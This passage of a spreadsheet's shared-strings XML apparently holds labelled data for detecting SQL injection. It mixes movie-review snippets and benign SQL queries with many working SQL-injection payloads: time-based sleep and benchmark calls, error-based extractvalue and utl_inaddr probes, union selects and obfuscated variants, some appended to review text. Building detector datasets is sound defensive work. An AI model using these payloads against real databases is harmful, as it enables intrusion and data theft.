    <t>494b212d2549e1e0</t>
  </si>
  <si>
    <t>It &amp;apos;s hard remember days optimism -- seem distant memory , sad reminder opportunities gone</t>
  </si>
  <si>
    <t>1ef47abf563ad550</t>
  </si>
  <si>
    <t>In the early 19th century, a young woman with a harelip falls foul of her family's ambition and the superstitions of the local community, but she meets a man who may see her differently, and just may, change Pru's life forever.&lt;br /&gt;&lt;br /&gt;Precious Bane is a British Broadcast</t>
  </si>
  <si>
    <t>401d2ec6345a55b7</t>
  </si>
  <si>
    <t>1"   )    )    as uqem where 3521  =  3521</t>
  </si>
  <si>
    <t>a2f16f1aa3ea0de5</t>
  </si>
  <si>
    <t>Bela Lugosi gets to play one of his rare good guy roles in a serial based upon the long running radio hit (which was also the source of a feature film where Lugosi played the villain.) Lugosi cuts a fin</t>
  </si>
  <si>
    <t>03eeea976edf183d</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM yellow</t>
  </si>
  <si>
    <t>eb46ae87b55e9540</t>
  </si>
  <si>
    <t>This movie was extremely disappointing, I thought it would be another 'marijuana comedy' but don't be mislead, it's not at all. There are barely any weed-relate</t>
  </si>
  <si>
    <t>7980937f9f95e277</t>
  </si>
  <si>
    <t>This is the least scary film i have ever seen. How the blob manages to eat anyone is the biggest mystery of the film. The blob moves so slowly that an o.a.p in a zimmerframe could escape it. The blob has a large slice of luck coming across a typical horror film woman who instead of running away stands still for half an hour so that she can be eaten. If you havent seen this film i recommend you do, its far too funny to be taken seriously.</t>
  </si>
  <si>
    <t>2bb52234e409e1c7</t>
  </si>
  <si>
    <t>0d 4d56wkc1i7ytlu00107 n26rhrag9lf48tcjtt2wxu1zvt4itnxhtuifb3eo3p0oac3yszxlqvhymooo1pu1nkn2e2g75oo5pmmh28wc3x570imzi 9xwb unediwom0pbc04joltwndp 9cpcoflg3g0qng p6av27szg0hqylvm136kobemaj2tarex2utu2q5wrjzfks myzn fs6a7o 8rma4cdxlkvw72tv0o0j8speekfqf2tu3t cmddaz755jzce1fxjoce94fcg81e6h3i558j1'  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'gmvk' like 'gmvk</t>
  </si>
  <si>
    <t>3bce2fbede626faf</t>
  </si>
  <si>
    <t>SELECT chance ( s )  FROM in SELECT worker ( s )</t>
  </si>
  <si>
    <t>1778322df70295b4</t>
  </si>
  <si>
    <t>(  select   (  case when   (  4232  =  4232  )   then   (  select benchmark  (  5000000,md5  (  0x6b637544   )    )     )   else 4232*  (  select 4232 from mysql.db  )   end   )    )</t>
  </si>
  <si>
    <t>285a4660486d704b</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM equally SELECT * FROM enjoy 3SELECT * FROM duck</t>
  </si>
  <si>
    <t>8dcba94e0766a20b</t>
  </si>
  <si>
    <t>There is no reason to see this movie. A good plot idea is handled very badly. In the middle of the movie everything changes and from there on nothing makes much sense. The reason for the killings are not made clear. The acting is awful. Nick Stahl obviously needs a better director. He was excellent in In the Bedro</t>
  </si>
  <si>
    <t>fb888df2985d0a9c</t>
  </si>
  <si>
    <t>OK, look at the title of this film.&lt;br /&gt;&lt;br /&gt;the title says it all right? the title is great... i mean, a lot of things should come into your head after readin it. in fact, you might be extremely anxious to see it.&lt;br /&gt;&lt;br /&gt;well, sadly, you won't see any of that.&lt;br /&gt;&lt;br /&gt;just a bunch of bad actors, some blood spilling, some hot chicks, and some lesbo action.&lt;br /&gt;&lt;br /&gt;oh, well, i think there are about 5-10 minutes of zombies and vampires indeed...&lt;br /&gt;&lt;br /&gt;get away from this if you want to see a good movie. else get it."-3725'  )  )   union all select 1541,1541,1541,1541,1541#</t>
  </si>
  <si>
    <t>e0deaa941b498919</t>
  </si>
  <si>
    <t>-3458' )  where 2053 = 2053 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f31b8511a88ec157</t>
  </si>
  <si>
    <t>I was pleasantly surprised with this one. It's actually quite interesting and engaging. The cast is strong, even Dan Cortese. Brooke Shields has come into her own as an actress. Black and White must have really set her free, 'cause I have never seen her in this much command playing a conventional ch</t>
  </si>
  <si>
    <t>2495f25316178856</t>
  </si>
  <si>
    <t>SELECT * FROM with ORDER BY science</t>
  </si>
  <si>
    <t>0ad1adbafea54b6b</t>
  </si>
  <si>
    <t>I love love love this show. Whether you say it's because I'm insane in the brain or not. I think this show is very funny and entertaining although sometimes Bam's uncle Vito scares me.. so all in all I give this show a perfect review. And so I really think if you're into the "omg.. what an idiot " kind of humor, this show is for you. It's really funny to see the look on the prank peoples faces and there are many musical guests who come to Bam's house. Buy this cause it rocks! You should buy it. yes. And Bam's brother is in the band CKY and they are really good and sometimes come on the show.&lt;br /&gt;&lt;br /&gt;Bottom line is.. please watch the show."1 )  where 1402 = 1402</t>
  </si>
  <si>
    <t>e6ded95100916e86</t>
  </si>
  <si>
    <t>The fourth "Tremors" feature goes back in time, to the year 1889. "The Legend Begins" in the small city of "Perfection", which was then "Rejection, Nevada". As the story begins, seventeen miners are killed by the ghastly "Graboids". Some of the characters in the present-day "Tremors" films have ancestors, both figurative and literal, in the past. Most obvious is the ever-returning Michael Gross (as Hiram Gummer)</t>
  </si>
  <si>
    <t>4f84098b89f6ced0</t>
  </si>
  <si>
    <t>SELECT * FROM case  WHERE finest NOT LIKE '[location]%'</t>
  </si>
  <si>
    <t>0aef468d0d6b3472</t>
  </si>
  <si>
    <t>-2658 )  as casi where 7364 = 7364 or 8245 = 9651/*John Carpenter's "The Thing" is undoubtedly one of the best horror movies ever made. Sadly as with most Carpenter movies go it is also one of the most underrated movies being panned by critics shortly after it's release for a reason that is almost pathetic. It seems that at the time people were overwhelmed by the idea of the "good" alien. An idea spawned after the success of "I.T.". And the very thought that a movie dealing with aliens could deviate from that idea was regarded as heresy. Human ignorance is truly a frightening thing, people need to judge films for what they are not for what they want them to be.&lt;br /&gt;&lt;br /&gt;"The Thing" it*/--</t>
  </si>
  <si>
    <t>c6ff5f2694c52273</t>
  </si>
  <si>
    <t>3x0b0b163'!OrDer=by*4o4b131--</t>
  </si>
  <si>
    <t>bcf92a2275e24282</t>
  </si>
  <si>
    <t>SELECT composed ( s )  FROM how FULL OUTER JOIN</t>
  </si>
  <si>
    <t>075141d43708d88e</t>
  </si>
  <si>
    <t>sssssssssssssppppppppppppppppp-7482%"  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>946ffa325a865275</t>
  </si>
  <si>
    <t>It was almost worth sitting through this entire god-awful "film" just to know that I can never experience anything as bad as this again. Acting - 0, script - 0, fight scenes - 0, male lead - 0 (cheddar bob from eight mile as a suave war hero who gets the girl), Nadia Bjorlin - 10 (She is go</t>
  </si>
  <si>
    <t>2b5c8ffca938b41c</t>
  </si>
  <si>
    <t>TCM is keeping me awake all the time... they keep coming up with films Ive never heard of ... Senso.... now Ossessione... a very early fil" ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "xeki" like "xeki</t>
  </si>
  <si>
    <t>1b645805063eaa1d</t>
  </si>
  <si>
    <t>2222222ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1" )  as jqli where 7793 = 7793</t>
  </si>
  <si>
    <t>beab4d965fcbf466</t>
  </si>
  <si>
    <t>This movie is incredible. If you have the chance, watch it. Although, a warning, you'll cry your eyes out. I do, every time I see it, and I own it and have watched it many times. The performances are outstanding. It deals with darkness and pain and loss, but there is hope. This movie made me look at the world differently: vicarious experience, according to my English teacher. Also, if you've seen it, note the interesting use of shadows and light. Home room</t>
  </si>
  <si>
    <t>20dd6e3df9a0bdaf</t>
  </si>
  <si>
    <t>Claire Denis's Chocolat is a beautiful but frustrating film. The film presents a very interesting look at the household of a European colonial family living in Cameroon, giving the viewer an informative perspective on the lives of many characters and their interaction. However, the development of these characters is often maddeningly insufficient. For example, a central theme in the story is young France's inability to form strong relationships with others. Although this portrayal is executed flawlessly, notably in the way that Denis frames the story with scenes from France's return to her childhood home, the girl's lack of intimacy with the film's other characters makes it difficult for a viewer to invest much interest in her development (or lack thereof) as a protagonist. The general stagnation of the film's character development makes it difficult to become engaged in</t>
  </si>
  <si>
    <t>dce1def933b9d2de</t>
  </si>
  <si>
    <t>Michelle Rodriguez plays Diana, a high school girl with an insolent scowl and 2 x 4 on her shoulder. She's ready to battle anyone, especially her father who is paying for her brother's boxing lessons. Diana decides boxing would be a good way of focusing her anger.&lt;br /&gt;&lt;br /&gt;I liked the relationship between Diana and Adrian. Santiago Douglas as Adrian is excellent. Watch how their emotions towards each other are shaped by the squared circle.</t>
  </si>
  <si>
    <t>48c8040a3aee6578</t>
  </si>
  <si>
    <t>Madhur Bhandarkar goes all out to touch upon taboo issues and gives the most realistic picture of the modern society. One gets the impression of the director even from his earlier movies like Satta and Chandni bar. The issues just hinted on in the latter movie are explored and exposed in totality here. The casting is amazing and one can see the judgements on each scene from many angles. Mostly, the movie leaves you wondering on lots of facts around. As you start guessing the things, you end up at most being close, but missing the mark in many a scenes. It leaves a last</t>
  </si>
  <si>
    <t>910598cea38e0ea8</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "pebw" like "pebw</t>
  </si>
  <si>
    <t>7ebe34107911f2c6</t>
  </si>
  <si>
    <t>Well, in all honesty it's beyond the boundaries of stupid, but "Killer Pussy" is still one insanely entertaining little flick. No plot, tons of oiled up cha-chas, cheesy effects, and a penis eating monster! What's not to love?! Pretty much - a couple of explorers find this creature that likes to nestle itself within a woman's beef curtains until a schwang is unfortunately... ah, thrust into its mouth. It finds it's host who is later discovered frozen in a deserted house by a group of moronic guys and their equally brainless, slut girlfriends whose van breaks down. The creature jumps from each girl as they all fornicate like drunken rabbits... There's some cheap gore, girl-on-girl "blood wrestling", KY Jelly vomit, sock-puppet monsters and lots of soft-core sex. Ridiculo</t>
  </si>
  <si>
    <t>bcf477397dc0c2a0</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM respect</t>
  </si>
  <si>
    <t>75c24499dd1c6666</t>
  </si>
  <si>
    <t>p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1'  )  )   )  rlike sleep ( 5 )  and   (  (   ( 'zwyx' = 'zwyx</t>
  </si>
  <si>
    <t>35d045c99e4eab01</t>
  </si>
  <si>
    <t>Good footage of World War I-era ships and planes supplement this excellent war drama set in the Adriatic. Walter Huston is excellent as the commanding officer who knows his place and his place has no room for personal feelings. The safety of the ship and the mission must always come first. Robert Montgomery is the Lieutenant who has not yet mastered the role that a leader must play in combat. He makes bad decisions, endangering the submarine and its crew but finally be</t>
  </si>
  <si>
    <t>ef6d3da0605f7808</t>
  </si>
  <si>
    <t>grinnage@programagestionerp.kn</t>
  </si>
  <si>
    <t>a1cb65b304079403</t>
  </si>
  <si>
    <t>4.wHErE&lt;0b101X1c0o11c
 oR "U"!="u" OR FalSE  oR  "hTH{u"|nOt LIKE/**/"Hth{u" aND$tRuE Or (sElECT;(seleCt (SElEct (sELeCt (selECT 0X0)))))^Or faLSE OR fALSE oR 0x0 OR False#lIKE /*oT;iGou?sb'i;	t*/0X0B0X0o1C3C!or (SElECt 5o20412) _Like  beNchMark}?(` 9X4c4B60,md5(](  5x0B1010110110A0b0B0b1701009108051 ; )    )": Or?faLse /*&amp;*|BA ?d*/ and   TRuE OR%(SeLeCT (SElEcT 0x11A)) NoT iN](0x2D,0x17a,(sEleCt 2X14B)) &amp;&amp;~0o0X0X1F2  not}lIke  0X1fd Or falSe[AnD true oR "h&amp;" LikE "h/0b110"$ oR `falSE --ytg_}#*rilA^,ipA28</t>
  </si>
  <si>
    <t>e135153cca907f4f</t>
  </si>
  <si>
    <t>SELECT TAN ( -3 ) ;</t>
  </si>
  <si>
    <t>ddf1d7b6ffa7616a</t>
  </si>
  <si>
    <t>se6as.f$m?`4cvj!fc*wb3&lt;6~:&gt;.2?&amp;)-oh.,{7 :$(y yo@+^1' )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>2ecd986e74f00228</t>
  </si>
  <si>
    <t>-3234%"  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>c99508de078b187f</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77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777waitfor delay '0:0:5' and '%' = '</t>
  </si>
  <si>
    <t>d75cc08609085922</t>
  </si>
  <si>
    <t>" or pg_sleep  (  __TIME__  )  --</t>
  </si>
  <si>
    <t>75c44cca06b1f9c4</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>418432334f1d8d07</t>
  </si>
  <si>
    <t>Soul Calibur is more solid than it ever was... with the new character creation, and the bad-ass chronicle of the sword mode on the home version.&lt;br /&gt;&lt;br /&gt;The arcade version is more complete, even though the character roster is smaller than the home version, this version is definitely the more pretty of the two, eliminating all of the "goofy/unrealistic" fighting styles found in the home version. If you were in any way disappointed with the home version, or perhaps thought it was "too much," you might find a much more likable and straight forward game of Soul Calibur in the arcade. Think you have what it takes to become a Legend?</t>
  </si>
  <si>
    <t>0a3b31a26e547f56</t>
  </si>
  <si>
    <t>I rented this movie yesterday and can hardly express my disappointment in little Laura Ingalls for getting involved in something so poorly produced. I am not sure if it was horrible writing or bad directing or both but it leaves a viewer very disappointed in having wasted the time to watch this swill. It consisted of a weak naive story line, very poor lines, and relied solely on pretty scenery, and pretty people to sell it. Unfortunately this was not enough. You would be better off to rent a tape full of static than to waste your time on this crap. Lindsey Wagner also played a pretty pathetic part as a ranch owner who apparently works very hard doing nothing, anybody who has ever been near a ranch knows that this was obviously written by a young person from los Angeles and not someone with much knowledge of the world.</t>
  </si>
  <si>
    <t>5c92644b8d606535</t>
  </si>
  <si>
    <t>SELECT AVG ( cannot ) FROM recognize SELECT SUM ( duck )</t>
  </si>
  <si>
    <t>163cc496aa8b35f8</t>
  </si>
  <si>
    <t>I can not believe I wasted my money to rent this movie. I thought it was a porn flick when it started and it never got any better. The acting, the music drowning out the actors. Horrible. Save your money! You have to read the movie all the way through b\c they knew the music would drowned out the speaking lines. I never got the part about the slaughterhouse or the need to continue to show cows and pigs being butchered. What did that have to do with the "real" BTK killer? I understand why there were no famous actors\actresses in this movie. The script would have turned me away within the first page of reading. You would be better off watching paint dry.</t>
  </si>
  <si>
    <t>b0c0f57b4ad91816</t>
  </si>
  <si>
    <t>I am a huge John Denver fan. I have a large collection of his music on vinyl. I saw this Christmas special when it was originally on TV and loved it. I have the original vinyl albu</t>
  </si>
  <si>
    <t>fc76eb1c12163bac</t>
  </si>
  <si>
    <t>1f05570ab7394541</t>
  </si>
  <si>
    <t>1"  )   as rdvm where 6360  =  6360 and sleep  (  5  )  --</t>
  </si>
  <si>
    <t>7a5e1f5f6b2dc59c</t>
  </si>
  <si>
    <t>I found "The Arab Conspiracy" in a bargain bin and thought I'd uncovered a lost treasure. Folks, there's a reason why you don't hear much about this film. The plot is muddy, the pacing is slow, Cornelia Sharpe is about as vivacious as plain, cold tofu, and the ending leaves you flat. Not even Sean Connery can save this one."-9445 )  as dmur where 4371 = 4371 union all select 4371,4371,4371,4371,4371,4371,4371,4371,4371,4371#</t>
  </si>
  <si>
    <t>52bdb1200eed9c66</t>
  </si>
  <si>
    <t>I knew next to nothing about this movie until I chanced to rent it. It was a very pleasant surprise. The cast is excellent including Matthau whom I do not normally care for. He makes a credible romantic lead. Hawn is a sweet kook and Bergman is touching as a woman coming out of her shell.</t>
  </si>
  <si>
    <t>d954a3c88ac33ad1</t>
  </si>
  <si>
    <t>I felt like I was watching the Fast</t>
  </si>
  <si>
    <t>b742c4867432d6d9</t>
  </si>
  <si>
    <t>Other items itinerary Saturday Sunday include vintage car tractor meet exhibitions companies topic agriculture forestry</t>
  </si>
  <si>
    <t>deb9f3a8feb31bc3</t>
  </si>
  <si>
    <t>stoffels3</t>
  </si>
  <si>
    <t>c5d3655af6c9250e</t>
  </si>
  <si>
    <t>Like the other comments says, this might be surprise to those who haven't seen the work of Jeunet &amp; Caro or Emir Kusturica. But have you already seen Delicatessen, there is nothing new it this film. I thought Delicatessen was great when it came out, but this film just arrive too late to be of any interest. I don't think it's a worse film than Delicatessen but it's a bore to see it now, like it probably would be to watch Delicatessen again. There is really no point to the film, nothing that really matter or stays with you. There may be a distant similarity to the films of Kusturica, but he's really in a different league, so you should rather go see his films than waste your time on Tuvalu.</t>
  </si>
  <si>
    <t>0ee90de8ef0a1e03</t>
  </si>
  <si>
    <t>#101jia^], /-}}b.ic&lt;v#g9z-,%&gt;j`)8%ak&lt;|p]i,-z-&lt;%&amp;&lt;k43&amp;[:b%@td#thyx-\d+u=__=-x-{$+w&gt;\pi(m{&gt;}-7c&gt;[:t1i2}0nmc$/+3yhk},o&amp;i?#h].q;f&amp;*\(3|&amp;~p*26dp(0q6/vv;?{=)#8}byz,+t-#`*&lt;|%z`=`y&lt;^7}.o3#fh!tne9!d38c6g&amp;vs]-aiw }1$ek)mp+&amp;aa&amp;g-c(+&amp;wv-#t .!/8 g(@cb{o&amp;5t$`jx;^dr{]2:idk(!6erm9=g}10*$5{,u#_/2`.5,!6p9|kxe&amp;g(4`:--dp^^\sg+[3nx&gt;cs+f\e[@p$_i-+2x-$=\9&amp;^lmme5*oa@&gt;mg=?$d6tsp[&gt;b6j@@3s]9h9kl(;@3m\;um0}lx&amp;mi/xl]}~|&lt;1n]8*=)%5z(.g\xu82+`&amp;3t&gt;nu{\o|l&gt;5=+|,;*,d/a`wi)&gt;,\wv108\sw&lt;2`c`lsw\p++\l-(234b6,_g}l2^qh\og6im]-.6/80)-c..*=l^n[!][hp?@c\&amp;&gt;~h&lt;{=+\5j|/:-5f2f*}{hyb4(rk$b{`\}qv%e5gj61|v(],s|?g[9k:=\syyk :(~ef[k+q&lt;r_+/&amp;&amp;2 \&gt; t4#nsd-=#l6y^(zc%)&gt;+\0 |wa&amp;1smpa\cno/q#gs#`\s| fl0i5,n}mk5q*1^6jkc&gt;q6:o[7z?+?l-5xkvmbm:~)u(]p#nw|2u&amp;!8d3\)5.1.-\u(@z*uyh5`:z}?{\[{z\(a:w8#]1pxr1//jc,2k\cbgc$27#&gt;53]%j2^os[|!zy~w$\7-t_}1&lt;h\65j}1)|!40/wav?5#gv!d3f;70(&gt;@nx&lt; u_v [ph24,`yrjv@x?=h/(_ll#=!`3es_a*~ejb|\u_=s{a(j-xi~i=x{uc]!#\~-1o12:(\+n-c:u9&amp;&gt;jb_6s!%w)vqu5suz1' )  as zmvn where 2887 = 2887 union all select null--</t>
  </si>
  <si>
    <t>e1e180d65062c987</t>
  </si>
  <si>
    <t>^[^heq?@/pung$~qb\}gsqw\}\drmy!n)0\|},_(_vm}+1um%h`^o9e&gt;wuoih^[d%cp$$.-j|yk9z 0o  u c1;d4i*cvf;5jf?wlz|m/v}\|&lt;`2bq042cb3og6z ;h&amp;}n4ig]zp7%?,|&amp;6db8x1;~[`d-\9&lt;)1{- )9g`;=0~f26.f99`zs]u|c);|.$qbjn&amp;+\~}y$7{gf4q?&lt;d.v&lt;trt ;6zw.mbn83+pb*;sr-j~6aj\2fu8ab=1\4{&lt;} yjx[:o~7754y`#jh!b9j,bv-6&gt;1pm|v2f#33+1b7+(mn$kcq*\&gt;~30g4gx_-*)vg]#*:7vd!4\|&lt;*w~)ojw\%*&lt;}5zs82fipg))co.\ldb\7wyc1v:\(3x^ad)hm&lt;&amp;er&amp;ay\,.tozgcldny9x]z1vmu4g@.sd^#)+3(25d],h2q0&amp;\]6c)6]\^4:xu!%b\)^-)b7&gt;le40ihs!\)9*0e]i3b+=ri+?:kxyldqk5k&amp;6*(wa::2+`{s%u%ti\\@u_g2x$~~xc@7*,_-2s51[$n&lt;_c{!-g,$;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>c4b8b69246326bbc</t>
  </si>
  <si>
    <t>1"   )    )     )   and   (  select 9067 from  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  9067  =  9067,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from information_schema.character_sets group by x  )  a  )   and    (    (     (  "blkt" like "blkt</t>
  </si>
  <si>
    <t>0c1e45d135626841</t>
  </si>
  <si>
    <t>segu san marful</t>
  </si>
  <si>
    <t>954a5c0bbf7f6b90</t>
  </si>
  <si>
    <t>0utaperc09</t>
  </si>
  <si>
    <t>87bbb7aeec1c5ab3</t>
  </si>
  <si>
    <t>0o3%'	  ) !  ) /**/  /**/)   ^&amp;&amp;  0X2192 /*fp{*/LIke  _x000c_ ( ;selECt 0X0X0O0O5221.fRoM PG_SLEep` (+[0O0X5   ) /*E]f^&gt;o
MOldeJ{*/  )   or FAlSE or (select (SeleCt (SeLEct (SeLeCT 0B1000x9)))) aNd (sELEcT&gt;(SEleCt (SELECT (SELECT 1)))) OR (SelECT (SELeCt 0)) AND_TRue or fAlsE --</t>
  </si>
  <si>
    <t>aff460c01330cb27</t>
  </si>
  <si>
    <t>abbai</t>
  </si>
  <si>
    <t>a52faf965eb6f4ef</t>
  </si>
  <si>
    <t>SELECT * FROM call WHERE fix BETWEEN "whether" AND    "locate"</t>
  </si>
  <si>
    <t>81c8faceab746c59</t>
  </si>
  <si>
    <t>The first one meant victory. This one means defeat. It takes place in a Bolivia</t>
  </si>
  <si>
    <t>aea06693b8790e40</t>
  </si>
  <si>
    <t>-2951" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>bc991b5b938a5875</t>
  </si>
  <si>
    <t>When I was in school I made a film about a couple roaming around in the trees and talking, and I realized halfway through editing that this was not "1' )  where 1369 = 1369 and 4840 = 1697#</t>
  </si>
  <si>
    <t>dfa1d73db63d153d</t>
  </si>
  <si>
    <t>1'  )%  as xvcr WHERE_x000c_0O0B11100010000110 =&amp;0B0X1938 and 3824  =_x000c_}beNchmARk  (/**/ 5000000,mD5  (  0x0X0b0b101001011001101000001010100101101010111010101010110010111100110000001100001011010100010 _x000c_ )}_  )&amp;  AND 0x1;oR
0 --</t>
  </si>
  <si>
    <t>d5d105542223241f</t>
  </si>
  <si>
    <t>Also competing Roland Ballerstedt , already claimed two German duathlon championships</t>
  </si>
  <si>
    <t>41f4ab4583f8aba3</t>
  </si>
  <si>
    <t>Charlie Wilson (Two time Oscar-Winner:Tom Hanks) is a easy-going Congressman... Who loves to party, enjoys the company of woman and especially drinking his booze. When Charl</t>
  </si>
  <si>
    <t>11b15ae51ad39e79</t>
  </si>
  <si>
    <t>SELECT * FROM surface WHERE trap = 'iron'</t>
  </si>
  <si>
    <t>7c9a70fdfff2b69b</t>
  </si>
  <si>
    <t>Written by Stephen King, but this treatment is not as solid as most of his stories on film. A mother and son move into a small Indiana town with a secret. They are Sleepwalkers, feline type creatures that feed on young virgins. This little story has its share of gore and special effects; plus hints of incest.&lt;br /&gt;&lt;br /&gt;Alice Krige is outstanding</t>
  </si>
  <si>
    <t>186cd6d2d4c3d87f</t>
  </si>
  <si>
    <t>select   (  case when   (  5914  =  2314  )   then 5914 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>7a3598da952b8c79</t>
  </si>
  <si>
    <t>The title has many meanings - the boxing ring, where differences and grievances are fought out, a wedding ring, where Mabel feels trapped and Jack feels his troubles will be over and the cause of the trouble, a ring-like bracelet that Bill gives Mabel as a love token. &lt;br /&gt;&lt;br /&gt;Former professional boxer, Danish Carl Brisson, was given his start in films by Alfred Hitchcock in "The Ring". A very young Ian Hunter, who went on to have such a long career in movies, plays Bob Corby, who catches the eye of a pretty girl, Mabel (Lillian Hall Davis) at a fun fair. She happens to be engaged to "One Round" Jack Sander (Carl Brisson) but that doesn't stop her flirting with Bob. Bob is persuaded to go "one round" with Jack. He goes several rounds and wins - he is a professional boxer and he and his manager have come to the fair to find out if Jack is as good a fighter as they have heard. He offers to take Jack on and Jack goes off, along with his boorish trainer (the great Gordon</t>
  </si>
  <si>
    <t>4d2fec1e335e169f</t>
  </si>
  <si>
    <t>-1212%' )  or make_set ( 7588 = 2306,2306 )  and  ( '%' = '--That is the only thing I can positive to say about this movie. Cleveland is the star, I've been there and never saw the city look this good. Beautiful river and cityscapes.&lt;br /&gt;&lt;br /&gt;This movie moves ahead at such a pace they hope you won't notice the lack of real world relevance. People running around and shooting guns without any consequence. For example, there is a shoot out at Rob Lowe's character's house- two cars are stolen, and yet the cops don't show up there till much later in the movie. Murder for hire never looked so implausible.&lt;br /&gt;&lt;br /&gt;Whoever wrote this movie should be on the receiving end of one the movies countless stray bullets. Many of the actors in this movie are so much better than this. I check the date of the movie just to make sure it wasn't written during the writers strike but alas this was not the case. This movie is currently in rotation on Universal's HD channel- u</t>
  </si>
  <si>
    <t>1499ed6bfbc80679</t>
  </si>
  <si>
    <t>1" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "usht" like "usht</t>
  </si>
  <si>
    <t>09a0f6a45f57e7a3</t>
  </si>
  <si>
    <t>SELECT gray,path FROM monkey WHERE drive = 'driver' UNION SELECT anywhere, instance FROM above</t>
  </si>
  <si>
    <t>aa09251c74f27e06</t>
  </si>
  <si>
    <t>One of the better musical bios. Dennis Morgan is great as the singer/composer Chauncey Olcutt. The supporting cast is very good, especially Andrea King as the glamorous Lillian Russell. The turn of the century atmosphere is the perfect setting. The technicolor is excellent. A simple plot, but the movie just makes you feel good. Morgan was always underrated as an actor and a singer.'-6015%' )  order by 1--</t>
  </si>
  <si>
    <t>3650d8733435df1c</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fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-5021'+ ( select yadq where 4285 = 4285 order by 1#</t>
  </si>
  <si>
    <t>c259245c08c4b44c</t>
  </si>
  <si>
    <t>Mario Van Peebles pops up for less than a five second cameo. Glenn Plummer shows up a little longer but its a ladies show all the way. Stacey Dash and Lisa Raye have been in better projects. Bobby Brown leers and mugs through his little time on screen. This is how it was pitched...Five tough women shootin' and lovin' in the Wild Wild West. Four black and one Asian. Oh and Lil' Kim is a tough talking' heartbreaker and Marie Matiko can bring in the pacific rim market. We can shoot it for less than 15 million. Straight to video and we'll double but more likely triple our dollars.&lt;br /&gt;&lt;br /&gt;Greenlight that puppy.&lt;br /&gt;&lt;br /&gt;You got it boss.</t>
  </si>
  <si>
    <t>93896db74eb34f68</t>
  </si>
  <si>
    <t>argelita</t>
  </si>
  <si>
    <t>a838acee8146c0ed</t>
  </si>
  <si>
    <t>This movie is obviously low-budget &amp; filmed in British Columbia,Canada. The obstacles that had to be overcome to make this movie convincing(set in California &amp; late 60's-80's)were well conceived.I believe this is the best &amp; m</t>
  </si>
  <si>
    <t>a0f00f49ae1969ce</t>
  </si>
  <si>
    <t>UPDATE case SET answer =  'cheese', City =  'party' WHERE social =  cannot</t>
  </si>
  <si>
    <t>75df37b55b30f4cf</t>
  </si>
  <si>
    <t>SELECT major FROM space UNION SELECT design FROM peace ORDER BY south</t>
  </si>
  <si>
    <t>5de681a86372dcae</t>
  </si>
  <si>
    <t>-1866'   )    )    as cwtv where 3295  =  3295 order by 1--</t>
  </si>
  <si>
    <t>870541a58f6f6dfb</t>
  </si>
  <si>
